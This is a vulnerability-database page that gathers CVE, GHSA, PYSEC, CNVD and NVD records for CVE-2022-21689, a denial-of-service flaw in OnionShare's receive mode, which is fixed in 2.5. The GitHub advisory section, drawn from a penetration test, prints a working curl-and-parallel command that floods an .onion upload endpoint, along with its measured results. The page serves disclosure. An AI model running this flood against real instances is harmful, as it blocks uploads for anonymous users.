cvelistv5 - cve-2022-21689

CVE-2022-21689 (GCVE-0-2022-21689)

Vulnerability from cvelistv5

Published

2022-01-18 22:10

Modified

2025-04-23 19:10

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Summary

OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.

References

URL	Tags
security-advisories@github.com	https://github.com/onionshare/onionshare/releases/tag/v2.5	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/onionshare/onionshare/releases/tag/v2.5	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc	Third Party Advisory

Impacted products

	Vendor	Product	Version
	onionshare	onionshare	Version: < 2.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T02:46:39.394Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-21689",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-23T15:58:07.839548Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-23T19:10:29.213Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "onionshare",
          "vendor": "onionshare",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-01-18T22:10:10.000Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
        }
      ],
      "source": {
        "advisory": "GHSA-jh82-c5jw-pxpc",
        "discovery": "UNKNOWN"
      },
      "title": "Denial of Service in Onionshare",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2022-21689",
          "STATE": "PUBLIC",
          "TITLE": "Denial of Service in Onionshare"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "onionshare",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "\u003c 2.5"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "onionshare"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-400: Uncontrolled Resource Consumption"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/onionshare/onionshare/releases/tag/v2.5",
              "refsource": "MISC",
              "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
            },
            {
              "name": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc",
              "refsource": "CONFIRM",
              "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
            }
          ]
        },
        "source": {
          "advisory": "GHSA-jh82-c5jw-pxpc",
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2022-21689",
    "datePublished": "2022-01-18T22:10:10.000Z",
    "dateReserved": "2021-11-16T00:00:00.000Z",
    "dateUpdated": "2025-04-23T19:10:29.213Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2022-21689\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2022-01-18T22:15:07.987\",\"lastModified\":\"2024-11-21T06:45:14.277\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.\"},{\"lang\":\"es\",\"value\":\"OnionShare es una herramienta de c\u00f3digo abierto que permite compartir archivos, alojar sitios web y chatear con amigos de forma segura y an\u00f3nima usando la red Tor. En las versiones afectadas, el modo de recepci\u00f3n limita las subidas concurrentes a 100 por segundo y bloquea otras subidas en el mismo segundo, lo que puede ser desencadenado por un simple script. Un adversario con acceso al modo de recepci\u00f3n puede bloquear la subida de archivos para otros. No se presenta forma de bloquear este ataque en el modo p\u00fablico debido a las propiedades de anonimato de la red Tor\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:N/A:P\",\"baseScore\":5.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-Other\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:onionshare:onionshare:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.5\",\"matchCriteriaId\":\"B3A7A46B-5812-492A-B66B-DC43A15A0A38\"}]}]}],\"references\":[{\"url\":\"https://github.com/onionshare/onionshare/releases/tag/v2.5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/onionshare/onionshare/releases/tag/v2.5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"affected\": [{\"product\": \"onionshare\", \"vendor\": \"onionshare\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.5\"}]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.\"}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}}], \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\", \"lang\": \"en\", \"type\": \"CWE\"}]}], \"providerMetadata\": {\"dateUpdated\": \"2022-01-18T22:10:10.000Z\", \"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\"}, \"references\": [{\"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/onionshare/onionshare/releases/tag/v2.5\"}, {\"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc\"}], \"source\": {\"advisory\": \"GHSA-jh82-c5jw-pxpc\", \"discovery\": \"UNKNOWN\"}, \"title\": \"Denial of Service in Onionshare\", \"x_legacyV4Record\": {\"CVE_data_meta\": {\"ASSIGNER\": \"security-advisories@github.com\", \"ID\": \"CVE-2022-21689\", \"STATE\": \"PUBLIC\", \"TITLE\": \"Denial of Service in Onionshare\"}, \"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"product_name\": \"onionshare\", \"version\": {\"version_data\": [{\"version_value\": \"\u003c 2.5\"}]}}]}, \"vendor_name\": \"onionshare\"}]}}, \"data_format\": \"MITRE\", \"data_type\": \"CVE\", \"data_version\": \"4.0\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.\"}]}, \"impact\": {\"cvss\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"CWE-400: Uncontrolled Resource Consumption\"}]}]}, \"references\": {\"reference_data\": [{\"name\": \"https://github.com/onionshare/onionshare/releases/tag/v2.5\", \"refsource\": \"MISC\", \"url\": \"https://github.com/onionshare/onionshare/releases/tag/v2.5\"}, {\"name\": \"https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc\", \"refsource\": \"CONFIRM\", \"url\": \"https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc\"}]}, \"source\": {\"advisory\": \"GHSA-jh82-c5jw-pxpc\", \"discovery\": \"UNKNOWN\"}}}, \"adp\": [{\"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-03T02:46:39.394Z\"}, \"title\": \"CVE Program Container\", \"references\": [{\"tags\": [\"x_refsource_MISC\", \"x_transferred\"], \"url\": \"https://github.com/onionshare/onionshare/releases/tag/v2.5\"}, {\"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"], \"url\": \"https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc\"}]}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2022-21689\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-04-23T15:58:07.839548Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-04-23T15:58:09.396Z\"}}]}",
      "cveMetadata": "{\"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"assignerShortName\": \"GitHub_M\", \"cveId\": \"CVE-2022-21689\", \"datePublished\": \"2022-01-18T22:10:10.000Z\", \"dateReserved\": \"2021-11-16T00:00:00.000Z\", \"dateUpdated\": \"2025-04-23T19:10:29.213Z\", \"state\": \"PUBLISHED\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-jh82-c5jw-pxpc

Vulnerability from github

Published

2022-01-21 23:20

Modified

2024-10-08 12:36

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

Denial of Service in Onionshare

Details

Between September 26, 2021 and October 8, 2021, Radically Open Security conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund's Red Team lab.

Vulnerability ID: OTF-012
Vulnerability type: Denial of Service
Threat level: Moderate

Description:

The receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script.

Technical description:

The following script uses GNU parallel and curl with around 6000 requests in parallel to send 10000 requests. A change in the ulimit -n configuration is required for it to work. This is sufficient to block file upload on a (public) receive instance.

seq 10000 | parallel --max-args 0 --jobs 6000 "curl -i -s -x socks5h://localhost:9150 -k -X $'POST' -H $'Host: csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------19182376703918074873375387042' -H $'Content-Length: 329' -H $'Connection: close' --data-binary $'-----------------------------19182376703918074873375387042\x0d\x0aContent-Disposition: form-data; name=\"file[]\"; filename=\"poc.txt\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aA\x0d\x0a-----------------------------19182376703918074873375387042\x0d\x0aContent-Disposition: form-data; name=\"text\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------19182376703918074873375387042--\x0d\x0a' $'http://csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion/upload-ajax'"

Attack duration was around 80 seconds.

Cases where over 99 requests were sent per second:

Every 0.1s: ls | grep... onionvm: Tue Oct 5 12:17:00 2021 78

Cases where files were successfully written to disk:

Every 0.1s: ls | wc -w onionvm: Tue Oct 5 12:17:00 2021 8399

This means that during the attack time 1601 requests of 10000 were dropped. We tried to upload multiple files in the web interface during the attack and were not successful.

The failsafe is used to prevent creating more than 100 directories per second:

https://github.com/onionshare/onionshare/blob/d08d5f0f32f755f504494d80794886f346fbafdb/cli/onionshare_cli/web/receive_mode.py#L386-L427

The limit of 100 requests/second is significantly lower than the possible network bandwidth and greatly reduces the attack complexity for denial of service. Our test was conducted over the tor network, which showed no limitation for the required bandwidth.

Impact:

An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.

Recommendation:

Remove this limitation, or
Derive directory name from milliseconds

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "onionshare-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21689"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-19T18:48:07Z",
    "nvd_published_at": "2022-01-18T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "Between September 26, 2021 and October 8, 2021, [Radically Open Security](https://www.radicallyopensecurity.com/) conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund\u0027s [Red Team lab](https://www.opentech.fund/labs/red-team-lab/).\n\n- Vulnerability ID: OTF-012\n- Vulnerability type: Denial of Service\n- Threat level: Moderate\n\n## Description:\n\nThe receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script.\n\n## Technical description:\n\nThe following script uses GNU parallel and curl with around 6000 requests in parallel to send 10000 requests. A change in the `ulimit -n` configuration is required for it to work. This is sufficient to block file upload on a (public) receive instance.\n\n```\nseq 10000 | parallel --max-args 0 --jobs 6000 \"curl -i -s -x socks5h://localhost:9150 -k -X $\u0027POST\u0027 -H $\u0027Host: csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion\u0027 -H $\u0027Accept-Encoding: gzip, deflate\u0027 -H $\u0027Content-Type: multipart/form-data; boundary=---------------------------19182376703918074873375387042\u0027 -H $\u0027Content-Length: 329\u0027 -H $\u0027Connection: close\u0027 --data-binary $\u0027-----------------------------19182376703918074873375387042\\x0d\\x0aContent-Disposition: form-data; name=\\\"file[]\\\"; filename=\\\"poc.txt\\\"\\x0d\\x0aContent-Type: text/plain\\x0d\\x0a\\x0d\\x0aA\\x0d\\x0a-----------------------------19182376703918074873375387042\\x0d\\x0aContent-Disposition: form-data; name=\\\"text\\\"\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a-----------------------------19182376703918074873375387042--\\x0d\\x0a\u0027 $\u0027http://csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion/upload-ajax\u0027\"\n```\n\nAttack duration was around 80 seconds.\n\nCases where over 99 requests were sent per second:\n\n```\nEvery 0.1s: ls | grep...   onionvm: Tue Oct 5 12:17:00 2021\n78\n```\n\nCases where files were successfully written to disk:\n\n```\nEvery 0.1s: ls | wc -w   onionvm: Tue Oct 5 12:17:00 2021\n8399\n```\n\nThis means that during the attack time 1601 requests of 10000 were dropped. We tried to upload multiple files in the web interface during the attack and were not successful.\n\nThe failsafe is used to prevent creating more than 100 directories per second:\n\nhttps://github.com/onionshare/onionshare/blob/d08d5f0f32f755f504494d80794886f346fbafdb/cli/onionshare_cli/web/receive_mode.py#L386-L427\n\nThe limit of 100 requests/second is significantly lower than the possible network bandwidth and greatly reduces the attack complexity for denial of service. Our test was conducted over the tor network, which showed no limitation for the required bandwidth.\n\n## Impact:\n\nAn adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.\n\n## Recommendation:\n\n- Remove this limitation, or\n- Derive directory name from milliseconds\n",
  "id": "GHSA-jh82-c5jw-pxpc",
  "modified": "2024-10-08T12:36:56Z",
  "published": "2022-01-21T23:20:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21689"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onionshare-cli/PYSEC-2022-40.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Denial of Service in Onionshare"
}

pysec-2022-40

Vulnerability from pysec

Published

2022-01-18 22:15

Modified

2022-03-09 00:16

Details

Impacted products

Name	purl
onionshare-cli	pkg:pypi/onionshare-cli

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "onionshare-cli",
        "purl": "pkg:pypi/onionshare-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.3",
        "2.3.1",
        "2.3.2",
        "2.3.3"
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21689",
    "GHSA-jh82-c5jw-pxpc"
  ],
  "details": "OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.",
  "id": "PYSEC-2022-40",
  "modified": "2022-03-09T00:16:43.116991Z",
  "published": "2022-01-18T22:15:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onionshare/onionshare/releases/tag/v2.5"
    }
  ]
}

cnvd-2022-06473

Vulnerability from cnvd

Title: OnionShare存在未明漏洞（CNVD-2022-06473）

Description:

OnionShare是一种开源工具。用于安全且匿名地共享文件、托管网站以及使用 Tor 网络与朋友聊天。

OnionShare存在安全漏洞，目前没有详细漏洞细节提供。

Severity: 高

Patch Name: OnionShare存在未明漏洞（CNVD-2022-06473）的补丁

Patch Description:

OnionShare是一种开源工具。用于安全且匿名地共享文件、托管网站以及使用 Tor 网络与朋友聊天。

OnionShare存在安全漏洞，目前没有详细漏洞细节提供。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description:

厂商已发布了漏洞修复程序，请及时关注更新： https://github.com/onionshare/onionshare/releases/tag/v2.5

Reference: https://nvd.nist.gov/vuln/detail/CVE-2022-21689

Impacted products

Name
OnionShare OnionShare

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2022-21689"
    }
  },
  "description": "OnionShare\u662f\u4e00\u79cd\u5f00\u6e90\u5de5\u5177\u3002\u7528\u4e8e\u5b89\u5168\u4e14\u533f\u540d\u5730\u5171\u4eab\u6587\u4ef6\u3001\u6258\u7ba1\u7f51\u7ad9\u4ee5\u53ca\u4f7f\u7528 Tor \u7f51\u7edc\u4e0e\u670b\u53cb\u804a\u5929\u3002\n\nOnionShare\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u6f0f\u6d1e\u7ec6\u8282\u63d0\u4f9b\u3002",
  "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://github.com/onionshare/onionshare/releases/tag/v2.5",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2022-06473",
  "openTime": "2022-01-25",
  "patchDescription": "OnionShare\u662f\u4e00\u79cd\u5f00\u6e90\u5de5\u5177\u3002\u7528\u4e8e\u5b89\u5168\u4e14\u533f\u540d\u5730\u5171\u4eab\u6587\u4ef6\u3001\u6258\u7ba1\u7f51\u7ad9\u4ee5\u53ca\u4f7f\u7528 Tor \u7f51\u7edc\u4e0e\u670b\u53cb\u804a\u5929\u3002\r\n\r\nOnionShare\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u6f0f\u6d1e\u7ec6\u8282\u63d0\u4f9b\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "OnionShare\u5b58\u5728\u672a\u660e\u6f0f\u6d1e\uff08CNVD-2022-06473\uff09\u7684\u8865\u4e01",
  "products": {
    "product": "OnionShare OnionShare"
  },
  "referenceLink": "https://nvd.nist.gov/vuln/detail/CVE-2022-21689",
  "serverity": "\u9ad8",
  "submitTime": "2022-01-19",
  "title": "OnionShare\u5b58\u5728\u672a\u660e\u6f0f\u6d1e\uff08CNVD-2022-06473\uff09"
}

fkie_cve-2022-21689

Vulnerability from fkie_nvd

Published

2022-01-18 22:15

Modified

2024-11-21 06:45

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/onionshare/onionshare/releases/tag/v2.5	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/onionshare/onionshare/releases/tag/v2.5	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/onionshare/onionshare/security/advisories/GHSA-jh82-c5jw-pxpc	Third Party Advisory

Impacted products

	Vendor	Product	Version
	onionshare	onionshare	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
